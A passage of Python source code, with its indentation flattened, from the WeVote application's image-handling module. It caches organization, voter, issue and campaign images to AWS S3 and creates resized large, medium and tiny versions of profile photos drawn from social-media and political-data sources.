organization_manager = OrganizationManager()
we_vote_image_manager = WeVoteImageManager()
if positive_value_exists(organization_we_vote_id):
# if candidate_we_vote_id is defined then retrieve cached images for that candidate only
organization_results = organization_manager.retrieve_organization_from_we_vote_id(organization_we_vote_id)
if organization_results['organization_found']:
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(None, None, organization_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
def cache_and_create_resized_images_for_organization(organization_we_vote_id):
"""
Create resized images for specific organization
:param organization_we_vote_id:
:return:
"""
create_all_resized_images_results = []
organization_manager = OrganizationManager()
we_vote_image_manager = WeVoteImageManager()
# cache original image
cache_images_for_one_organization_results = cache_organization_master_images(
organization_we_vote_id)
# create resized images for that organization only
organization_results = organization_manager.retrieve_organization_from_we_vote_id(organization_we_vote_id)
if organization_results['success']:
organization_we_vote_id = organization_results['organization'].we_vote_id
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(None, None, organization_we_vote_id)
for we_vote_image in we_vote_image_list_results['we_vote_image_list']:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_resized_images_results.update(cache_images_for_one_organization_results)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
def cache_and_create_resized_images_for_voter(voter_id):
"""
Create resized images for specific voter_id
:param voter_id:
:return:
"""
create_all_resized_images_results = []
voter_manager = VoterManager()
we_vote_image_manager = WeVoteImageManager()
# cache original image
cache_images_for_a_voter_results = cache_voter_master_images(voter_id)
# create resized images for that voter only
voter_results = voter_manager.retrieve_voter_by_id(voter_id)
if voter_results['success']:
voter_we_vote_id = voter_results['voter'].we_vote_id
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(voter_we_vote_id)
for we_vote_image in we_vote_image_list_results['we_vote_image_list']:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_resized_images_results.update(cache_images_for_a_voter_results)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
def cache_campaignx_image(
python_image_library_image=None,
campaignx_we_vote_id=None,
kind_of_image_original=False,
kind_of_image_campaignx_photo=False):
"""
Cache master campaignx images to AWS.
:param python_image_library_image:
:param campaignx_we_vote_id:
:param kind_of_image_original:
:param kind_of_image_campaignx_photo:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
is_active_version = True
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
campaignx_we_vote_id=campaignx_we_vote_id,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_original=kind_of_image_original)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
# image file validation and get source image properties
analyze_source_images_results = analyze_image_in_memory(python_image_library_image)
if not analyze_source_images_results['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID ",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID "
image_width = analyze_source_images_results['image_width']
image_height = analyze_source_images_results['image_height']
image_format = analyze_source_images_results['image_format']
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
campaignx_we_vote_id=campaignx_we_vote_id,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
if kind_of_image_campaignx_photo:
image_type = CAMPAIGNX_PHOTO_IMAGE_NAME
else:
image_type = 'campaignx_photo_image'
if kind_of_image_original:
master_image = MASTER_IMAGE
else:
master_image = 'calculated'
# ex issue_image_master-2017210_1_48x48.png
we_vote_image_file_name = "{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=image_type,
master_image=master_image,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
we_vote_image_file_location = campaignx_we_vote_id + "/" + we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_python_image_locally(
python_image_library_image, we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location, image_format)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': False,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(
we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status'] + " "
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
kind_of_image_large = not kind_of_image_original
save_source_info_results = we_vote_image_manager.save_we_vote_image_campaignx_info(
we_vote_image=we_vote_image,
image_width=analyze_source_images_results['image_width'],
image_height=analyze_source_images_results['image_height'],
image_url_https=we_vote_image.we_vote_image_url,
same_day_image_version=same_day_image_version,
image_url_valid=image_url_valid)
status += " " + save_source_info_results['status']
if not save_source_info_results['success']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
# set active version False for other master images for same campaignx
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
campaignx_we_vote_id=campaignx_we_vote_id,
image_url_https=we_vote_image.we_vote_image_url,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo)
status += set_active_version_false_results['status']
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': we_vote_image
}
return results
def retrieve_all_images_for_one_issue(issue_we_vote_id):
"""
Retrieve all cached images for one issue
:param issue_we_vote_id:
:return:
"""
we_vote_image_list = []
we_vote_image_manager = WeVoteImageManager()
if issue_we_vote_id:
# if issue_we_vote_id is defined then retrieve cached images for that issue only
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(issue_we_vote_id=issue_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
def retrieve_all_images_for_one_voter(voter_id):
"""
Retrieve all cached images for one voter
:param voter_id:
:return:
"""
we_vote_image_list = []
voter_manager = VoterManager()
we_vote_image_manager = WeVoteImageManager()
if voter_id:
# if voter_id is defined then retrieve cached images for that voter only
voter_results = voter_manager.retrieve_voter_by_id(voter_id)
if voter_results['success']:
voter_we_vote_id = voter_results['voter'].we_vote_id
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(voter_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
def create_resized_image_if_not_created(we_vote_image):
"""
Create resized images only if not created for we_vote_image object
:param we_vote_image:
:return:
"""
voter_we_vote_id = we_vote_image.voter_we_vote_id
campaignx_we_vote_id = we_vote_image.campaignx_we_vote_id
candidate_we_vote_id = we_vote_image.candidate_we_vote_id
organization_we_vote_id = we_vote_image.organization_we_vote_id
google_civic_election_id = we_vote_image.google_civic_election_id
we_vote_parent_image_id = we_vote_image.id
twitter_id = we_vote_image.twitter_id
facebook_user_id = we_vote_image.facebook_user_id
maplight_id = we_vote_image.maplight_id
vote_smart_id = we_vote_image.vote_smart_id
other_source = we_vote_image.other_source
kind_of_image_twitter_profile = we_vote_image.kind_of_image_twitter_profile
kind_of_image_twitter_background = we_vote_image.kind_of_image_twitter_background
kind_of_image_twitter_banner = we_vote_image.kind_of_image_twitter_banner
kind_of_image_facebook_profile = we_vote_image.kind_of_image_facebook_profile
kind_of_image_facebook_background = we_vote_image.kind_of_image_facebook_background
kind_of_image_maplight = we_vote_image.kind_of_image_maplight
kind_of_image_vote_smart = we_vote_image.kind_of_image_vote_smart
kind_of_image_ballotpedia_profile = we_vote_image.kind_of_image_ballotpedia_profile
kind_of_image_campaignx_photo = we_vote_image.kind_of_image_campaignx_photo
kind_of_image_linkedin_profile = we_vote_image.kind_of_image_linkedin_profile
kind_of_image_wikipedia_profile = we_vote_image.kind_of_image_wikipedia_profile
kind_of_image_other_source = we_vote_image.kind_of_image_other_source
image_offset_x = we_vote_image.facebook_background_image_offset_x
image_offset_y = we_vote_image.facebook_background_image_offset_y
if positive_value_exists(we_vote_image.we_vote_image_file_location):
image_format = we_vote_image.we_vote_image_file_location.split(".")[-1]
else:
image_format = ""
create_resized_image_results = {
'voter_we_vote_id': voter_we_vote_id,
'campaignx_we_vote_id': campaignx_we_vote_id,
'candidate_we_vote_id': candidate_we_vote_id,
'organization_we_vote_id': organization_we_vote_id,
'cached_large_image': False,
'cached_medium_image': False,
'cached_tiny_image': False,
}
if we_vote_image.kind_of_image_twitter_profile:
image_url_https = we_vote_image.twitter_profile_image_url_https
elif we_vote_image.kind_of_image_twitter_background:
image_url_https = we_vote_image.twitter_profile_background_image_url_https
elif we_vote_image.kind_of_image_twitter_banner:
image_url_https = we_vote_image.twitter_profile_banner_url_https
elif we_vote_image.kind_of_image_facebook_profile:
image_url_https = we_vote_image.facebook_profile_image_url_https
elif we_vote_image.kind_of_image_facebook_background:
image_url_https = we_vote_image.facebook_background_image_url_https
elif we_vote_image.kind_of_image_maplight:
image_url_https = we_vote_image.maplight_image_url_https
elif we_vote_image.kind_of_image_vote_smart:
image_url_https = we_vote_image.vote_smart_image_url_https
elif we_vote_image.kind_of_image_ballotpedia_profile:
image_url_https = we_vote_image.ballotpedia_profile_image_url
elif we_vote_image.kind_of_image_campaignx_photo:
image_url_https = we_vote_image.campaignx_photo_url_https
elif we_vote_image.kind_of_image_linkedin_profile:
image_url_https = we_vote_image.linkedin_profile_image_url
elif we_vote_image.kind_of_image_wikipedia_profile:
image_url_https = we_vote_image.wikipedia_profile_image_url
elif we_vote_image.kind_of_image_other_source:
image_url_https = we_vote_image.other_source_image_url
else:
image_url_https = ''
# Check if resized image versions exist or not
resized_version_exists_results = check_resized_version_exists(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
image_url_https=image_url_https,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source
)
if not resized_version_exists_results['large_image_version_exists']:
# Large version does not exist so create resize image and cache it
cache_resized_image_locally_results = cache_resized_image_locally(
google_civic_election_id,
image_url_https,
we_vote_parent_image_id,
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_format=image_format,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_large=True,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y,
other_source=other_source)
create_resized_image_results['cached_large_image'] = cache_resized_image_locally_results['success']
else:
create_resized_image_results['cached_large_image'] = IMAGE_ALREADY_CACHED
# Only some of our kinds of images have medium or tiny sizes
if we_vote_image.kind_of_image_campaignx_photo or \
we_vote_image.kind_of_image_twitter_profile or \
we_vote_image.kind_of_image_facebook_profile or \
we_vote_image.kind_of_image_maplight or \
we_vote_image.kind_of_image_vote_smart or \
we_vote_image.kind_of_image_ballotpedia_profile or \
we_vote_image.kind_of_image_linkedin_profile or \
we_vote_image.kind_of_image_wikipedia_profile or \
we_vote_image.kind_of_image_other_source:
if not resized_version_exists_results['medium_image_version_exists']:
# Medium version does not exist so create resize image and cache it
cache_resized_image_locally_results = cache_resized_image_locally(
google_civic_election_id, image_url_https, we_vote_parent_image_id,
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_format=image_format,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_medium=True,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y,
other_source=other_source)
create_resized_image_results['cached_medium_image'] = cache_resized_image_locally_results['success']
else:
create_resized_image_results['cached_medium_image'] = IMAGE_ALREADY_CACHED
if not resized_version_exists_results['tiny_image_version_exists']:
# Tiny version does not exist so create resize image and cache it
cache_resized_image_locally_results = cache_resized_image_locally(
google_civic_election_id, image_url_https, we_vote_parent_image_id,
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_format=image_format,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_tiny=True,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y,
other_source=other_source)
create_resized_image_results['cached_tiny_image'] = cache_resized_image_locally_results['success']
else:
create_resized_image_results['cached_tiny_image'] = IMAGE_ALREADY_CACHED
return create_resized_image_results
def check_resized_version_exists(
voter_we_vote_id=None,
campaignx_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
image_url_https=None,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_campaignx_photo=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False):
"""
Check if large, medium or tiny image versions already exist or not
:param voter_we_vote_id:
:param campaignx_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param image_url_https:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_campaignx_photo:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:return:
"""
results = {
'medium_image_version_exists': False,
'tiny_image_version_exists': False,
'large_image_version_exists': False
}
we_vote_image_list_results = {
'we_vote_image_list': [],
}
we_vote_image_manager = WeVoteImageManager()
if kind_of_image_twitter_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
twitter_profile_image_url_https=image_url_https)
elif kind_of_image_twitter_background:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
twitter_profile_background_image_url_https=image_url_https)
elif kind_of_image_twitter_banner:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
twitter_profile_banner_url_https=image_url_https)
elif kind_of_image_facebook_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
facebook_profile_image_url_https=image_url_https)
elif kind_of_image_facebook_background:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
facebook_background_image_url_https=image_url_https)
elif kind_of_image_maplight:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
maplight_image_url_https=image_url_https)
elif kind_of_image_vote_smart:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
vote_smart_image_url_https=image_url_https)
elif kind_of_image_ballotpedia_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
ballotpedia_profile_image_url=image_url_https)
elif kind_of_image_campaignx_photo:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
campaignx_we_vote_id,
campaignx_photo_url_https=image_url_https)
elif kind_of_image_linkedin_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
linkedin_profile_image_url=image_url_https)
elif kind_of_image_wikipedia_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
wikipedia_profile_image_url=image_url_https)
elif kind_of_image_other_source:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
other_source_image_url=image_url_https)
we_vote_image_list = we_vote_image_list_results['we_vote_image_list']
for we_vote_image in we_vote_image_list:
if we_vote_image.we_vote_image_url is None or we_vote_image.we_vote_image_url == "":
# if we_vote_image_url is empty then delete that entry
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
elif we_vote_image.kind_of_image_medium:
results['medium_image_version_exists'] = True
elif we_vote_image.kind_of_image_tiny:
results['tiny_image_version_exists'] = True
elif we_vote_image.kind_of_image_large:
results['large_image_version_exists'] = True
return results
def cache_resized_image_locally(
google_civic_election_id,
image_url_https,
we_vote_parent_image_id,
voter_we_vote_id=None,
candidate_we_vote_id=None,
campaignx_we_vote_id=None,
organization_we_vote_id=None,
issue_we_vote_id=None,
twitter_id=None,
image_format=None,
facebook_user_id=None,
other_source=None,
maplight_id=None,
vote_smart_id=None,
is_active_version=True,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_issue=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_campaignx_photo=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
kind_of_image_original=False,
kind_of_image_large=False,
kind_of_image_medium=False,
kind_of_image_tiny=False,
image_offset_x=0,
image_offset_y=0):
"""
Resize the image as per image version and cache the same
:param google_civic_election_id:
:param image_url_https:
:param we_vote_parent_image_id:
:param voter_we_vote_id:
:param campaignx_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param issue_we_vote_id:
:param twitter_id:
:param image_format:
:param facebook_user_id:
:param other_source: # can be MapLight or VoteSmart
:param maplight_id:
:param vote_smart_id:
:param is_active_version:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_issue:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_campaignx_photo:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param kind_of_image_original:
:param kind_of_image_large:
:param kind_of_image_medium:
:param kind_of_image_tiny:
:param image_offset_x: # For Facebook background
:param image_offset_y: # For Facebook background
:return:
"""
success = False
status = ''
we_vote_image_created = False
resized_image_created = False
image_stored_from_source = False
image_stored_locally = False
image_stored_to_aws = False
image_versions = []
we_vote_image_file_location = None
we_vote_image_manager = WeVoteImageManager()
# Set up image we will use for large, medium or tiny
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
google_civic_election_id=google_civic_election_id,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
kind_of_image_large=kind_of_image_large,
kind_of_image_medium=kind_of_image_medium,
kind_of_image_tiny=kind_of_image_tiny)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
image_width = ''
image_height = ''
if kind_of_image_issue:
if kind_of_image_large:
image_width = ISSUES_IMAGE_LARGE_WIDTH
image_height = ISSUES_IMAGE_LARGE_HEIGHT
elif kind_of_image_medium:
image_width = ISSUES_IMAGE_MEDIUM_WIDTH
image_height = ISSUES_IMAGE_MEDIUM_HEIGHT
elif kind_of_image_tiny:
image_width = ISSUES_IMAGE_TINY_WIDTH
image_height = ISSUES_IMAGE_TINY_HEIGHT
elif kind_of_image_campaignx_photo:
if kind_of_image_large:
image_width = CAMPAIGN_PHOTO_LARGE_MAX_WIDTH
image_height = CAMPAIGN_PHOTO_LARGE_MAX_HEIGHT
elif kind_of_image_medium:
image_width = CAMPAIGN_PHOTO_MEDIUM_MAX_WIDTH
image_height = CAMPAIGN_PHOTO_MEDIUM_MAX_HEIGHT
elif kind_of_image_tiny:
image_width = CAMPAIGN_PHOTO_SMALL_MAX_WIDTH
image_height = CAMPAIGN_PHOTO_SMALL_MAX_HEIGHT
else:
if kind_of_image_large:
image_width = PROFILE_IMAGE_LARGE_WIDTH
image_height = PROFILE_IMAGE_LARGE_HEIGHT
elif kind_of_image_medium:
image_width = PROFILE_IMAGE_MEDIUM_WIDTH
image_height = PROFILE_IMAGE_MEDIUM_HEIGHT
elif kind_of_image_tiny:
image_width = PROFILE_IMAGE_TINY_WIDTH
image_height = PROFILE_IMAGE_TINY_HEIGHT
if kind_of_image_twitter_profile:
image_type = TWITTER_PROFILE_IMAGE_NAME
elif kind_of_image_twitter_background:
image_type = TWITTER_BACKGROUND_IMAGE_NAME
elif kind_of_image_twitter_banner:
image_type = TWITTER_BANNER_IMAGE_NAME
elif kind_of_image_facebook_profile:
image_type = FACEBOOK_PROFILE_IMAGE_NAME
elif kind_of_image_facebook_background:
image_type = FACEBOOK_BACKGROUND_IMAGE_NAME
image_height = SOCIAL_BACKGROUND_IMAGE_HEIGHT
image_width = SOCIAL_BACKGROUND_IMAGE_WIDTH
elif kind_of_image_maplight:
image_type = MAPLIGHT_IMAGE_NAME
elif kind_of_image_vote_smart:
image_type = VOTE_SMART_IMAGE_NAME
elif kind_of_image_issue:
image_type = ISSUE_IMAGE_NAME
elif kind_of_image_ballotpedia_profile:
image_type = BALLOTPEDIA_IMAGE_NAME
elif kind_of_image_campaignx_photo:
image_type = CAMPAIGNX_PHOTO_IMAGE_NAME
elif kind_of_image_linkedin_profile:
image_type = LINKEDIN_IMAGE_NAME
elif kind_of_image_wikipedia_profile:
image_type = WIKIPEDIA_IMAGE_NAME
elif kind_of_image_other_source:
image_type = other_source
else:
image_type = ''
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
